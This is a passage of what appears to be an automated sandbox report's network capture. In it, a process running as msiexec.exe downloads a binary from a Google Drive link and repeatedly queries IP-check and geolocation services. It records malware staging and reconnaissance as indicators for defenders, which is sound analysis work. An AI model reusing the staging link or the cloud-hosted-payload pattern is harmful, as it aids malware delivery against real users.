Pragma: no-cache
X-Request-ID: e544bf8b0933c6f528076c6e64ba83b3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49724 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:28.916474104 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:04:29.574677944 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:04:29 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 31ae1267f851d377866a6a781b14f360
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49726 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:04:30.325721025 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:04:30.988492966 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:04:30 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 00ce315accf73753c21b080ccc916c8f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:04:13 UTC | 216 | OUT | GET /uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2024-10-22 14:04:14 UTC | 1610 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 22 Oct 2024 14:04:14 GMT
Location: https://drive.usercontent.google.com/download?id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-bDtljU7-xCQsDa7IepRT5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49710 | 142.250.186.65 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:04:15 UTC | 258 | OUT | GET /download?id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-10-22 14:04:17 UTC | 4890 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="JCECHOJbaBp94.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 279616
Last-Modified: Sun, 20 Oct 2024 23:51:46 GMT
X-GUploader-UploadID: AHmUCY11cOvNkv2Gt5Qa4wCXHWZH8psdHTiff4797bIYW3isr80wj-Q4stB2IdQjnieIwPUkqVk
Date: Tue, 22 Oct 2024 14:04:17 GMT
Expires: Tue, 22 Oct 2024 14:04:17 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=Iagp9A==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                          Data Ascii: I="`}uVT_'~Nx+oD.JAD9+"Wu%o,;LknSB:Qp}alSPCcO0sk^0S*;KgIMkSG]QUg(ERky+vb-C\p\R;MOK(=H#-eqrCV
                                                                                          2024-10-22 14:04:17 UTC1378INData Raw: 9c 44 34 4f 3a f1 7b 2f 9d f8 43 cb 30 bc 40 df 63 11 10 0b 89 d8 26 e1 84 2d 91 b3 22 24 aa 10 38 a3 17 3a cb 40 90 7c b5 dd 03 d8 7a bb 77 d3 dc 5d cc aa d1 a0 22 de bc 36 be 2a 37 ff dd 3c 3c 5d c2 77 d5 e6 ce 4e a3 35 24 8d a5 4e a4 5b cf c2 f8 59 9d a1 ff 05 2b 21 78 6d 87 d3 63 1f 38 92 32 59 ef 61 e2 3b 2e 0d 58 31 91 96 3e b4 b9 5b ef 35 6c d7 ad e7 2b 1f ea 18 00 e3 77 ed b4 e0 d0 6c 9f 35 80 f4 5f 1f 97 47 53 fe 45 ba 1e 1d 0e b1 41 45 17 6a 09 2d d5 76 f0 6c f5 70 6f 0d bc 7a c9 b1 31 8e cc 99 09 39 c2 54 4c 05 d9 4b 83 40 a1 d7 07 4d 23 14 1a c8 8c 85 0c fd 20 69 7d a6 bc ad 57 ef 8e 79 38 cc 05 05 bf f7 31 1d b8 dc 7f c5 73 61 e1 35 af b3 69 70 83 b5 ff ec 2e d9 26 19 69 28 26 05 e1 8b 03 b0 87 55 c7 27 8a e5 db 46 1a 1c 52 f6 ee aa 2d 87 71
                                                                                          Data Ascii: D4O:{/C0@c&-"$8:@|zw]"6*7<<]wN5$N[Y+!xmc82Ya;.X1>[5l+wl5_GSEAEj-vlpoz19TLK@M# i}Wy81sa5ip.&i(&U'FR-q
                                                                                          2024-10-22 14:04:17 UTC1378INData Raw: 00 13 94 a0 ee e3 c4 9e ac 13 fd dc 07 5e ee 39 7d dd c8 6d d2 b9 dc 5a a2 b8 3e 7c 71 ce 71 ba 86 d1 fa 3a 03 9a 87 a0 f5 55 e5 bf 54 9d af 36 79 32 87 c1 f5 6c 1d ba 13 42 4c 95 10 a2 5a b9 51 b1 05 3d 58 b7 93 7c c8 e3 ad cb 90 73 a1 b0 a4 fa 5a d1 24 a5 43 2f d8 64 d2 d5 b2 0d ea 3e e1 4c 8e a5 5b be 03 10 5e 9e 2c 3f 4d 96 26 0a 2d 89 f6 37 ec 16 35 58 2d da 30 49 48 25 f1 02 ec 76 7f 63 48 d9 91 22 8b 5a 09 52 1b 17 93 c8 08 f8 81 62 5e f8 43 27 1b 3d a7 22 ea a0 7f 0e 62 22 ce b0 ce f9 b9 28 d7 68 3b e2 c1 54 cd 46 a4 b3 85 50 9d 55 96 e4 23 f8 55 24 ee b1 bc 3d 22 11 bc 08 ae 1b eb 85 51 80 cb eb d0 db 10 93 4d 1a 11 55 45 47 68 24 e4 c2 b6 b0 33 26 54 54 c0 0e c4 9c 4e 3e e4 70 43 09 51 98 f8 ed 65 15 ac 12 e0 6a 7e 15 a9 ac c8 54 06 59 3e c4 39
                                                                                          Data Ascii: ^9}mZ>|qq:UT6y2lBLZQ=X|sZ$C/d>L[^,?M&-75X-0IH%vcH"ZRb^C'="b"(h;TFPU#U$="QMUEGh$3&TTN>pCQej~TY>9


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.10  49712        188.114.97.3    443               6624  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes  Direction  Data
2024-10-22 14:04:20 UTC  87     OUT        GET /xml/173.254.250.76 HTTP/1.1
                                           Host: reallyfreegeoip.org
                                           Connection: Keep-Alive
2024-10-22 14:04:20 UTC  896    IN         HTTP/1.1 200 OK
                                           Date: Tue, 22 Oct 2024 14:04:20 GMT
                                           Content-Type: application/xml
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           access-control-allow-origin: *
                                           vary: Accept-Encoding
                                           Cache-Control: max-age=86400
                                           CF-Cache-Status: HIT
                                           Age: 31216
                                           Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhL7Bsq%2BcD3P4RDyRA3T4oJMFQf8ego45CFdymQxH7oOZRvlAxv5L3arbKFooqqqqmkP3%2BqEcchM7DopHwkcev%2FW32kiJ5Dejuj0yq9N7k2ckbFVF9jSj1YOh4F6cWHZfA1q%2FvYK"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d6a09342c5a0c03-DFW
                                           alt-svc: h3=":443"; ma=86400
                                           server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2043754&cwnd=244&unsent_bytes=0&cid=b877f01f787eeca4&ts=169&x=0"
2024-10-22 14:04:20 UTC  366    IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                           Data Ascii: 167
                                                       <Response>
                                                           <IP>173.254.250.76</IP>
                                                           <CountryCode>US</CountryCode>
                                                           <CountryName>United States</CountryName>
                                                           <RegionCode>TX</RegionCode>
                                                           <RegionName>Texas</RegionName>
                                                           <City>Killeen</City>
                                                           <ZipCode>76549</ZipCode>
                                                           <TimeZone>America/Chicago</Time
2024-10-22 14:04:20 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.10  49713        188.114.97.3    443               6624  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes  Direction  Data
2024-10-22 14:04:21 UTC  63     OUT        GET /xml/173.254.250.76 HTTP/1.1
                                           Host: reallyfreegeoip.org
2024-10-22 14:04:21 UTC  896    IN         HTTP/1.1 200 OK
                                           Date: Tue, 22 Oct 2024 14:04:21 GMT
                                           Content-Type: application/xml
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           access-control-allow-origin: *
                                           vary: Accept-Encoding
                                           Cache-Control: max-age=86400
                                           CF-Cache-Status: HIT
                                           Age: 31217
                                           Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zh5lhJGD3GwUbrekY16W9H6xPtYHR2g4ibJp9aXk94oM3pxI%2BTTJRL0cSJC4C7TEdKfG8FwLwCHfdkRXy3qYlkHnaWarK9fWkYav6ZBh%2BBo%2BtiKYxLzsXMOkj8xI%2BOl3iJpLA0Pp"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d6a093a08452e5a-DFW
                                           alt-svc: h3=":443"; ma=86400
                                           server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2126284&cwnd=246&unsent_bytes=0&cid=25220a249c7a6ae4&ts=153&x=0"
2024-10-22 14:04:21 UTC  366    IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                           Data Ascii: 167
                                                       <Response>
                                                           <IP>173.254.250.76</IP>
                                                           <CountryCode>US</CountryCode>
                                                           <CountryName>United States</CountryName>
                                                           <RegionCode>TX</RegionCode>
                                                           <RegionName>Texas</RegionName>
                                                           <City>Killeen</City>
                                                           <ZipCode>76549</ZipCode>
                                                           <TimeZone>America/Chicago</Time
2024-10-22 14:04:21 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.10  49715        188.114.97.3    443               6624  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes  Direction  Data
2024-10-22 14:04:22 UTC  63     OUT        GET /xml/173.254.250.76 HTTP/1.1
                                           Host: reallyfreegeoip.org
2024-10-22 14:04:22 UTC  896    IN         HTTP/1.1 200 OK
                                           Date: Tue, 22 Oct 2024 14:04:22 GMT
                                           Content-Type: application/xml
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           access-control-allow-origin: *
                                           vary: Accept-Encoding
                                           Cache-Control: max-age=86400
                                           CF-Cache-Status: HIT
                                           Age: 31218
                                           Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9OokLckpy%2FLl1qOCfo4GRcH%2B1jE6AqUBAQHBR9dmpp4KHLmPLsfCNeUnznPiDwUwDPMLq5Z5bJAqdAi%2BYfCKAYy8j3wk3CuHXMRps441XutRikGCULGYhgjAKa%2B0gAb7CbZibpd"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d6a094308766c7f-DFW
                                           alt-svc: h3=":443"; ma=86400
                                           server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2594982&cwnd=237&unsent_bytes=0&cid=81d1cd371ca670a7&ts=148&x=0"
2024-10-22 14:04:22 UTC  366    IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                           Data Ascii: 167
                                                       <Response>
                                                           <IP>173.254.250.76</IP>
                                                           <CountryCode>US</CountryCode>
                                                           <CountryName>United States</CountryName>
                                                           <RegionCode>TX</RegionCode>
                                                           <RegionName>Texas</RegionName>
                                                           <City>Killeen</City>
                                                           <ZipCode>76549</ZipCode>
                                                           <TimeZone>America/Chicago</Time
2024-10-22 14:04:22 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.10  49717        188.114.97.3    443               6624  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes  Direction  Data
2024-10-22 14:04:24 UTC  87     OUT        GET /xml/173.254.250.76 HTTP/1.1
                                           Host: reallyfreegeoip.org
                                           Connection: Keep-Alive
2024-10-22 14:04:24 UTC  890    IN         HTTP/1.1 200 OK
                                           Date: Tue, 22 Oct 2024 14:04:24 GMT
                                           Content-Type: application/xml
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           access-control-allow-origin: *
                                           vary: Accept-Encoding
                                           Cache-Control: max-age=86400
                                           CF-Cache-Status: HIT
                                           Age: 31220
                                           Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rnpXTaDZRmrfnsMLG64s9bmLdPJ53J5Uc2hXr0bXUvcpon9GbG5rYPAHckbsm26mgRRhhijpXN0YWPuQp7EwW1OWt0uBrxZluyDysbsPXi4qvTrokKSVzRT8sCaXv%2BjTgPcDCrkN"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d6a094bed106b3f-DFW
                                           alt-svc: h3=":443"; ma=86400
                                           server-timing: cfL4;desc="?proto=TCP&rtt=1115&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2538124&cwnd=245&unsent_bytes=0&cid=04682ce2c15e719a&ts=152&x=0"
2024-10-22 14:04:24 UTC  366    IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                           Data Ascii: 167
                                                       <Response>
                                                           <IP>173.254.250.76</IP>
                                                           <CountryCode>US</CountryCode>
                                                           <CountryName>United States</CountryName>
                                                           <RegionCode>TX</RegionCode>
                                                           <RegionName>Texas</RegionName>
                                                           <City>Killeen</City>
                                                           <ZipCode>76549</ZipCode>
                                                           <TimeZone>America/Chicago</Time
2024-10-22 14:04:24 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.10  49719        188.114.97.3    443               6624  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes  Direction  Data
2024-10-22 14:04:25 UTC  63     OUT        GET /xml/173.254.250.76 HTTP/1.1
                                           Host: reallyfreegeoip.org
2024-10-22 14:04:26 UTC  900    IN         HTTP/1.1 200 OK
                                           Date: Tue, 22 Oct 2024 14:04:25 GMT
                                           Content-Type: application/xml
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           access-control-allow-origin: *
                                           vary: Accept-Encoding
                                           Cache-Control: max-age=86400
                                           CF-Cache-Status: HIT
                                           Age: 31221
                                           Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIMwcjscuoV3C1jvB5%2FQCABa7ySWiKG%2BrU7dTgbSE2Fdprcc8Lknjpg%2Bh3W2TO%2Fd2bqDtfYpRcG%2FDz%2BlwyH2lsHzjcLSgsi9bdkz3fPOuoo02dprZcgrwGTZEhySzLYfRiK2Fc9H"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d6a09563e350b9d-DFW
                                           alt-svc: h3=":443"; ma=86400
                                           server-timing: cfL4;desc="?proto=TCP&rtt=1572&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1863577&cwnd=247&unsent_bytes=0&cid=97d6bb3cec61ff38&ts=151&x=0"
2024-10-22 14:04:26 UTC  366    IN         Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                           Data Ascii: 167
                                                       <Response>
                                                           <IP>173.254.250.76</IP>
                                                           <CountryCode>US</CountryCode>
                                                           <CountryName>United States</CountryName>
                                                           <RegionCode>TX</RegionCode>
                                                           <RegionName>Texas</RegionName>
                                                           <City>Killeen</City>
                                                           <ZipCode>76549</ZipCode>
                                                           <TimeZone>America/Chicago</Time
2024-10-22 14:04:26 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.10  49721        188.114.97.3    443               6624  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes  Direction  Data
2024-10-22 14:04:27 UTC  87     OUT        GET /xml/173.254.250.76 HTTP/1.1
                                           Host: reallyfreegeoip.org
                                           Connection: Keep-Alive
2024-10-22 14:04:27 UTC  894    IN         HTTP/1.1 200 OK
                                           Date: Tue, 22 Oct 2024 14:04:27 GMT
                                           Content-Type: application/xml
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           access-control-allow-origin: *
                                           vary: Accept-Encoding
                                           Cache-Control: max-age=86400
                                           CF-Cache-Status: HIT
                                           Age: 31223
                                           Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9FD6YpnF3dft2mfVcQcO2pQe46hxyIUoE0tynug5n%2Fl1w6IhQA%2F9CtjVZDLvyjQdbNpQCmMsoEbYkHZ3zSf8gwxiske4nO23s44UYTjwZG%2BwvzCxwBFlYbZFanjV9RXpoP78m3a"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
